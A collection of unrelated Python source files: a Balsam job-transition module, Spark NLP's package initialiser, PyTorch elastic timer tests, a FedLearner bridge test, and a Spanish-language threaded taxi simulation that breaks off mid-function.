def preprocess(job):
logger.debug(f'{job.cute_id} in preprocess')
# Get preprocesser exe
preproc_app = job.preprocess
if not preproc_app:
job.state = 'PREPROCESSED'
return
if not os.path.exists(preproc_app.split()[0]):
# TODO: look for preproc in the EXE directories
message = f"Preprocessor {preproc_app} does not exist on filesystem"
raise BalsamTransitionError(message)
# Create preprocess-specific environment
envs = job.get_envs()
# Run preprocesser with special environment in job working directory
out = os.path.join(job.working_directory, f"preprocess.log")
with open(out, 'w') as fp:
fp.write(f"# Balsam Preprocessor: {preproc_app}")
fp.flush()
try:
args = preproc_app.split()
logger.info(f"{job.cute_id} preprocess Popen {args}")
proc = subprocess.Popen(args, stdout=fp,
stderr=subprocess.STDOUT, env=envs,
cwd=job.working_directory,
)
retcode = proc.wait(timeout=PREPROCESS_TIMEOUT_SECONDS)
proc.communicate()
except Exception as e:
message = f"Preprocess failed: {e}"
try:
proc.kill()
except:
pass
raise BalsamTransitionError(message) from e
if retcode != 0:
tail = get_tail(out)
message = f"{job.cute_id} preprocess returned {retcode}:\n{tail}"
raise BalsamTransitionError(message)
job.state = 'PREPROCESSED'
logger.debug(f"{job.cute_id} preprocess done")
def postprocess(job, *, error_handling=False, timeout_handling=False):
logger.debug(f'{job.cute_id} in postprocess')
if error_handling and timeout_handling:
raise ValueError("Both error-handling and timeout-handling is invalid")
if error_handling:
logger.info(f'{job.cute_id} handling RUN_ERROR')
if timeout_handling:
logger.info(f'{job.cute_id} handling RUN_TIMEOUT')
# Get postprocesser exe
postproc_app = job.postprocess
# If no postprocesssor; move on (unless in error_handling mode)
if not postproc_app:
if error_handling:
message = f"{job.cute_id} handle error: no postprocessor found!"
raise BalsamTransitionError(message)
elif timeout_handling:
job.state = 'RESTART_READY'
logger.warning(f'{job.cute_id} unhandled job timeout: marked RESTART_READY')
return
else:
job.state = 'POSTPROCESSED',
logger.debug(f'{job.cute_id} no postprocess: skipped')
return
if not os.path.exists(postproc_app.split()[0]):
# TODO: look for postproc in the EXE directories
message = f"Postprocessor {postproc_app} does not exist on filesystem"
raise BalsamTransitionError(message)
# Create postprocess-specific environment
envs = job.get_envs(timeout=timeout_handling, error=error_handling)
# Run postprocesser with special environment in job working directory
out = os.path.join(job.working_directory, f"postprocess.log")
with open(out, 'w') as fp:
fp.write(f"# Balsam Postprocessor: {postproc_app}\n")
if timeout_handling:
fp.write("# Invoked to handle RUN_TIMEOUT\n")
if error_handling:
fp.write("# Invoked to handle RUN_ERROR\n")
fp.flush()
try:
args = postproc_app.split()
logger.info(f"{job.cute_id} postprocess Popen {args}")
proc = subprocess.Popen(args, stdout=fp,
stderr=subprocess.STDOUT, env=envs,
cwd=job.working_directory,
)
retcode = proc.wait(timeout=POSTPROCESS_TIMEOUT_SECONDS)
proc.communicate()
except Exception as e:
message = f"Postprocess failed: {e}"
try:
proc.kill()
except:
pass
raise BalsamTransitionError(message) from e
if retcode != 0:
tail = get_tail(out, nlines=30)
message = f"{job.cute_id} postprocess returned {retcode}:\n{tail}"
raise BalsamTransitionError(message)
job.refresh_from_db()
# If postprocessor handled error or timeout, it should have changed job's
# state. If it failed to do this, mark FAILED. Otherwise, POSTPROCESSED.
if error_handling and job.state == 'RUN_ERROR':
message = f"{job.cute_id} Error handling didn't fix job state: marking FAILED"
raise BalsamTransitionError(message)
if timeout_handling and job.state == 'RUN_TIMEOUT':
message = f"{job.cute_id} Timeout handling didn't change job state: marking FAILED"
raise BalsamTransitionError(message)
# Only move the state along to POSTPROCESSED if the job is still in RUN_DONE
# and the post.py returned normally. Otherwise, post.py might mark a job
# FAILED, and you override it with POSTPROCESSED, breaking the workflow.
if job.state == 'RUN_DONE':
job.state = 'POSTPROCESSED'
logger.debug(f"{job.cute_id} postprocess done")
def handle_timeout(job):
if job.post_timeout_handler:
logger.debug(f'{job.cute_id} invoking postprocess with timeout_handling flag')
postprocess(job, timeout_handling=True)
else:
raise BalsamTransitionError(f"{job.cute_id} no timeout handling: marking FAILED")
def handle_run_error(job):
if job.post_error_handler:
logger.debug(f'{job.cute_id} invoking postprocess with error_handling flag')
postprocess(job, error_handling=True)
else:
raise BalsamTransitionError("No error handler: run failed")
TRANSITIONS = {
'AWAITING_PARENTS': check_parents,
'READY': stage_in,
'STAGED_IN': preprocess,
'RUN_DONE': postprocess,
'RUN_TIMEOUT': handle_timeout,
'RUN_ERROR': handle_run_error,
'POSTPROCESSED': stage_out,
}
|
__init__.py
|
# Copyright 2017-2022 John Snow Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import subprocess
import threading
from pyspark.sql import SparkSession
from sparknlp import annotator
from sparknlp.base import DocumentAssembler, Finisher, EmbeddingsFinisher, TokenAssembler, Chunk2Doc, Doc2Chunk
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.java_gateway import launch_gateway
sys.modules['com.johnsnowlabs.nlp.annotators'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer.wordpiece'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.regex'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.crf'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos.perceptron'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.deep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.vivekn'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.norvig'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.symmetric'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.dep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.typdep'] = annotator
sys.modules['com.johnsnowlabs.nlp.embeddings'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.context'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sentence_detector_dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.seq2seq'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ws'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.er'] = annotator
annotators = annotator
embeddings = annotator
def start(gpu=False,
spark23=False,
spark24=False,
spark32=False,
memory="16G",
cache_folder="",
log_folder="",
cluster_tmp_dir="",
real_time_output=False,
output_level=1):
"""Starts a PySpark instance with default parameters for Spark NLP.
The default parameters would result in the equivalent of:
.. code-block:: python
:param gpu: start Spark NLP with GPU
:param spark23: start Spark NLP on Apache Spark 2.3.x
:param spark24: start Spark NLP on Apache Spark 2.4.x
:param spark32: start Spark NLP on Apache Spark 3.2.x
:param memory: set driver memory for SparkSession
:param cache_folder: The location to download and exctract pretrained Models and Pipelines
:param log_folder: The location to save logs from annotators during training such as NerDLApproach,
ClassifierDLApproach, SentimentDLApproach, MultiClassifierDLApproach, etc.
:param cluster_tmp_dir: The location to use on a cluster for temporarily files
:param output_level: int, optional
Output level for logs, by default 1
:param real_time_output:
:substitutions:
SparkSession.builder \\
.appName("Spark NLP") \\
.master("local[*]") \\
.config("spark.driver.memory", "16G") \\
.config("spark.serializer", "org.apache.spark.serializer.KryoSerializer") \\
.config("spark.kryoserializer.buffer.max", "2000M") \\
.config("spark.driver.maxResultSize", "0") \\
.config("spark.jars.packages", "com.johnsnowlabs.nlp:spark-nlp_2.12:|release|") \\
.getOrCreate()
Parameters
----------
gpu : bool, optional
Whether to enable GPU acceleration (must be set up correctly), by default False
spark23 : bool, optional
Whether to use the Spark 2.3.x version of Spark NLP, by default False
spark24 : bool, optional
Whether to use the Spark 2.4.x version of Spark NLP, by default False
spark32 : bool, optional
Whether to use the Spark 3.2.x version of Spark NLP, by default False
memory : str, optional
How much memory to allocate for the Spark driver, by default "16G"
real_time_output : bool, optional
Whether to ouput in real time, by default False
output_level : int, optional
Output level for logs, by default 1
Returns
-------
:class:`SparkSession`
The initiated Spark session.
"""
current_version = "3.4.2"
class SparkNLPConfig:
def __init__(self):
self.master, self.app_name = "local[*]", "Spark NLP"
self.serializer, self.serializer_max_buffer = "org.apache.spark.serializer.KryoSerializer", "2000M"
self.driver_max_result_size = "0"
# Spark NLP on Apache Spark 3.2.x
self.maven_spark32 = "com.johnsnowlabs.nlp:spark-nlp-spark32_2.12:{}".format(current_version)
self.maven_gpu_spark32 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark32_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 3.0.x/3.1.x
self.maven_spark = "com.johnsnowlabs.nlp:spark-nlp_2.12:{}".format(current_version)
self.maven_gpu_spark = "com.johnsnowlabs.nlp:spark-nlp-gpu_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 2.4.x
self.maven_spark24 = "com.johnsnowlabs.nlp:spark-nlp-spark24_2.11:{}".format(current_version)
self.maven_gpu_spark24 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark24_2.11:{}".format(current_version)
# Spark NLP on Apache Spark 2.3.x
self.maven_spark23 = "com.johnsnowlabs.nlp:spark-nlp-spark23_2.11:{}".format(current_version)
self.maven_gpu_spark23 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark23_2.11:{}".format(current_version)
def start_without_realtime_output():
builder = SparkSession.builder \
.appName(spark_nlp_config.app_name) \
.master(spark_nlp_config.master) \
.config("spark.driver.memory", memory) \
.config("spark.serializer", spark_nlp_config.serializer) \
.config("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer) \
.config("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu and spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark23)
elif gpu and spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark24)
elif gpu and spark32:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark32)
elif spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark23)
elif spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark24)
elif spark32:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark32)
elif gpu:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
builder.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
builder.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
builder.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
return builder.getOrCreate()
def start_with_realtime_output():
class SparkWithCustomGateway:
def __init__(self):
spark_conf = SparkConf()
spark_conf.setAppName(spark_nlp_config.app_name)
spark_conf.setMaster(spark_nlp_config.master)
spark_conf.set("spark.driver.memory", memory)
spark_conf.set("spark.serializer", spark_nlp_config.serializer)
spark_conf.set("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer)
spark_conf.set("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if spark32:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark32)
elif gpu and spark32:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark32)
elif gpu:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
spark_conf.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
spark_conf.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
spark_conf.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
# Make the py4j JVM stdout and stderr available without buffering
popen_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# Launch the gateway with our custom settings
self.gateway = launch_gateway(conf=spark_conf, popen_kwargs=popen_kwargs)
self.process = self.gateway.proc
# Use the gateway we launched
spark_context = SparkContext(gateway=self.gateway)
self.spark_session = SparkSession(spark_context)
self.out_thread = threading.Thread(target=self.output_reader)
self.error_thread = threading.Thread(target=self.error_reader)
self.std_background_listeners()
def std_background_listeners(self):
self.out_thread.start()
self.error_thread.start()
def output_reader(self):
for line in iter(self.process.stdout.readline, b''):
print('{0}'.format(line.decode('utf-8')), end='')
def error_reader(self):
RED = '\033[91m'
RESET = '\033[0m'
for line in iter(self.process.stderr.readline, b''):
if output_level == 0:
print(RED + '{0}'.format(line.decode('utf-8')) + RESET, end='')
else:
# output just info
pass
def shutdown(self):
self.spark_session.stop()
self.gateway.shutdown()
self.process.communicate()
self.out_thread.join()
self.error_thread.join()
return SparkWithCustomGateway()
spark_nlp_config = SparkNLPConfig()
if real_time_output:
if spark23 or spark24:
spark_session = start_without_realtime_output()
return spark_session
else:
# Available from Spark 3.0.x
class SparkRealTimeOutput:
def __init__(self):
self.__spark_with_custom_gateway = start_with_realtime_output()
self.spark_session = self.__spark_with_custom_gateway.spark_session
def shutdown(self):
self.__spark_with_custom_gateway.shutdown()
return SparkRealTimeOutput()
else:
spark_session = start_without_realtime_output()
return spark_session
def version():
"""Returns the current Spark NLP version.
Returns
-------
str
The current Spark NLP version.
"""
return '3.4.2'
|
local_timer_test.py
|
# Owner(s): ["oncall: r2p"]
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
run_tests,
IS_WINDOWS,
IS_MACOS,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
# func2 should time out
def func2(n, mp_queue):
if mp_queue is not None:
timer.configure(timer.LocalTimerClient(mp_queue))
if n > 0:
with timer.expires(after=0.1):
func2(n - 1, None)
time.sleep(0.2)
class LocalTimerTest(unittest.TestCase):
def setUp(self):
self.ctx = mp.get_context("spawn")
self.mp_queue = self.ctx.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
timer rather than creating a new one. That is only the last
recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
p = self.ctx.Process(target=func2, args=(2, self.mp_queue))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@unittest.skipIf(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
enqueues ``n`` timer requests into ``mp_queue`` one element per
interval seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class MultiprocessingRequestQueueTest(unittest.TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
@unittest.skipIf(
TEST_WITH_TSAN,
"test incompatible with tsan",
)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class LocalTimerServerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
self.server.stop()
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(
watchdog_call_count, int(wait / self.max_interval) - 1
)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
tests that a single expired timer on a process should terminate
the process and clean up all pending timers that was owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
disabled_bridge.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import threading
import tensorflow.compat.v1 as tf
import numpy as np
import fedlearner as fl
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import trainer_worker_service_pb2 as tws_pb
def fake_start_message(seq_num, iter_id):
return tws_pb.TrainerWorkerMessage(
seq_num=seq_num,
start=tws_pb.StartMessage(iter_id=iter_id)
)
class TestBridge(unittest.TestCase):
def test_bridge(self):
bridge1 = fl.trainer.bridge.Bridge('leader', 50051, 'localhost:50052')
bridge2 = fl.trainer.bridge.Bridge('follower', 50052, 'localhost:50051')
t = threading.Thread(target=lambda _: bridge1.connect(), args=(None,))
t.start()
bridge2.connect()
t.join()
g1 = tf.Graph()
with g1.as_default():
x = tf.constant(3.0, name='x')
y = tf.constant(2.0, name='y')
send_x = bridge1.send_op('x', x)
send_y = bridge1.send_op('y', y)
g2 = tf.Graph()
with g2.as_default():
recv_x = bridge2.receive_op('x', dtype=tf.float32)
recv_y = bridge2.receive_op('y', dtype=tf.float32)
out = recv_x - recv_y
bridge1.start(123)
bridge2.start(123)
with tf.Session(graph=g1) as sess:
sess.run([send_x, send_y])
with tf.Session(graph=g2) as sess:
self.assertEqual(sess.run(out), 1.0)
bridge1.commit()
bridge2.commit()
bridge2.terminate()
bridge1.terminate()
def test_seq_and_ack(self):
bridge1 = fl.trainer.bridge.Bridge('leader', 40051, 'localhost:40052')
bridge2 = fl.trainer.bridge.Bridge('follower', 40052, 'localhost:40051')
t = threading.Thread(target=lambda _: bridge1.connect(), args=(None,))
t.start()
bridge2.connect()
t.join()
client1 = bridge1._client
msg = fake_start_message(0, 0)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_SUCCESS)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_MESSAGE_DUPLICATED)
msg = fake_start_message(3, 1)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_MESSAGE_MISSING)
bridge2.terminate()
bridge1.terminate()
if __name__ == '__main__':
unittest.main()
|
taxis.py
|
from threading import Thread, Lock
from math import sqrt
from time import sleep
import random
from sys import argv
class Celda:
def __init__(self):
# Variable que almacena el taxi
self.taxi = None
# Lista de clientes
self.clientes = []
# Mutex de la celda
self.mutex = Lock()
def add_taxi(self, taxi):
"""Introduce el taxi pasado por argumento en la celda."""
self.taxi = taxi
def remove_taxi(self):
"""Elimina el taxi existente en la celda."""
self.taxi = None
def add_cliente(self, cliente):
"""Introduce el taxi pasado por argumento en la celda."""
self.clientes.append(cliente)
def pop_cliente(self):
"""Saca uno de los clientes de la celda."""
return self.clientes.pop(0)
def remove_cliente(self, cliente):
"""Saca de la celda al cliente pasado como argumento."""
self.clientes.remove(cliente)
def lock_mutex(self):
"""Bloquea el mutex de la celda."""
self.mutex.acquire()
def release_mutex(self):
"""Libera el mutex de la celda."""
self.mutex.release()
class Cliente:
def __init__(self, id_):
# Identificador del cliente
self.id = id_
# No ha sido recogido por ningun taxi
self.taken = 0
# El cliente esta vivo
self.vivo = 1
# Tupla con las coordenadas de origen
self.origen = (0, 0)
# Tupla con las coordenadas de destino
self.destino = (0, 0)
def vive(self):
"""Ciclo de vida del cliente."""
# Bloquea el mutex global
lock.acquire()
# Genera posiciones aleatorias de origen y destino
self.origen = random_position()
self.destino = random_position()
# Si el origen y el destino son iguales, vuelve a generar el destino hasta que sean distintos
while self.origen == self.destino:
self.destino = random_position()
# Se mete en la matriz
self.entrar()
# Pide un taxi para que le lleve a su destino
if verbose_mode != 2:
self.pedir_taxi()
# Libera el mutex global
lock.release()
# Mientras este vivo
while self.vivo == 1:
# Mientras no haya sido recogido ni haya llegado a su destino
while self.taken == 0 and self.ha_llegado() == 0:
sleep(0.6)
# Obtiene las coordenadas de las celdas adyacentes
celdas_ady = get_celdas_ady(self.origen[0], self.origen[1])
# Bloquea el mutex en las celdas adyacentes
for (x, y) in celdas_ady:
matriz[x][y].lock_mutex()
# Si no ha sido recogido por ningun taxi mientras bloqueaba los mutex
if self.taken == 0:
# Sale de su celda
self.salir()
# Se calcula el siguiente movimiento de forma aleatoria
self.origen = random_move(celdas_ady)
# Se mueve a la nueva posicion
self.entrar()
# Si está en modo verbose, imprime por pantalla el estado del cliente
if verbose_mode == 1:
self.mostrar_estado()
# Libera el mutex en las celdas adyacentes
for (x, y) in celdas_ady:
matriz[x][y].release_mutex()
# Si llega a pie al destino
if self.ha_llegado() == 1:
print("Soy {0} y he llegado a pie mi destino ({1}, {2}). ".format(str(self.id), str(self.destino[0]),
str(self.destino[1])))
# Bloquea el mutex global
lock.acquire()
# Genera nuevas posiciones aleatorias de origen y destino
self.origen = random_position()
self.destino = random_position()
# Si el origen y el destino son iguales, vuelve a generar el destino hasta que sean distintos
while self.origen == self.destino:
self.destino = random_position()
global num_clientes
# Incrementa el numero de clientes
num_clientes += 1
self.id = "Cliente " + str(num_clientes - 1)
# Se mete en la matriz
self.entrar()
if verbose_mode != 2:
self.pedir_taxi()
# Libera el mutex global
lock.release()
def pedir_taxi(self):
"""Imprime por pantalla la posicion y destino del cliente y pide un taxi."""
print("Soy {0} y estoy en ({1}, {2}), mi destino es ({3}, {4}). TAXIII!!!".format(str(self.id),
str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1])))
def mostrar_estado(self):
"""Imprime por pantalla la posicion y destino del cliente."""
print("Soy {0} y estoy en ({1}, {2}), mi destino es ({3}, {4}).".format(str(self.id), str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1])))
def ha_llegado(self):
"""Devuelve 1 si el cliente ha llegado al destino por su propio pie."""
return 1 if (self.origen[0] == self.destino[0] and self.origen[1] == self.destino[1]) else 0
def salir(self):
"""El cliente sale de la celda."""
# Obtiene la lista de clientes que hay en la celda
matriz[self.origen[0]][self.origen[1]].remove_cliente(self)
def entrar(self):
"""El cliente entra en la celda."""
matriz[self.origen[0]][self.origen[1]].add_cliente(self)
class Taxi:
def __init__(self, id_):
self.id = id_
self.busy = 0
self.origen = (0, 0)
self.destino = (0, 0)
self.cliente = None
self.num_clientes = 0
def empieza_servicio(self):
"""Ciclo de vida del taxi. """
# Genera una posicion aleatoria de origen
origen = random_position()
# Bloquea el mutex global
lock.acquire()
# Vuelve a generar la posicion de origen mientras en la generada haya ya un taxi
while hay_taxi(origen):
origen = random_position()
# Toma como origen una posicion vacia
self.origen = origen
# Se mete en dicha posicion
self.add_taxi()
# Libera el mutex global
lock.release()
global game_end
# Mientras no se haya terminado el juego
while game_end == 0:
# Obtiene las posiciones de las celdas adyacentes disponibles
pos_coord = self.get_pos_coord()
# Bloquea el mutex de dichas celdas adyacentes
for (x, y) in pos_coord:
matriz[x][y].lock_mutex()
# Si hay un cliente en su celda, lo recoge
if self.hay_cliente():
self.coger_cliente()
# Libera los mutex
for (x, y) in pos_coord:
matriz[x][y].release_mutex()
# Mientras esta libre y el juego no ha terminado
while self.busy == 0 and game_end == 0:
sleep(0.1)
# Obtiene las posiciones de las celdas adyacentes disponibles
pos_coord = self.get_pos_coord()
# Bloquea el mutex de dichas celdas adyacentes
for (x, y) in pos_coord:
